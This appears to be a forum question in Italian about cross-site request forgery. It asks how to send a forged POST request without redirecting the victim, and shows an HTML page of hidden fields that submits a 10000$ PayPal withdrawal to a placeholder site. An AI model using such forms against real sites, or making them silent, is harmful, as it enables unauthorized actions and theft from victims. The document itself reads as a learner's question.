C'è un modo per falsificare la richiesta di post senza essere reindirizzati alla pagina in cui vengono inviati i parametri. Ad esempio:
<html>
<head>
<title>
CRSF example
</title>
</head>
<body onload="">
<form action="http://www.somesite.org/action.php" method="POST">
<input type="hidden" name="money" value="10000$"/>
<input type="hidden" name="payment" value="Paypal"/>
<input type="hidden" name="user" value="user1"/>
<input type="submit" name="submit" value="Withdraw"/>
</form>
</body>
</html>
Quando l'utente visita questa pagina, viene attivato csrf e vengono inviati i valori e viene eseguito il reindirizzamento. Questi valori vengono inviati senza reindirizzamento.Grazie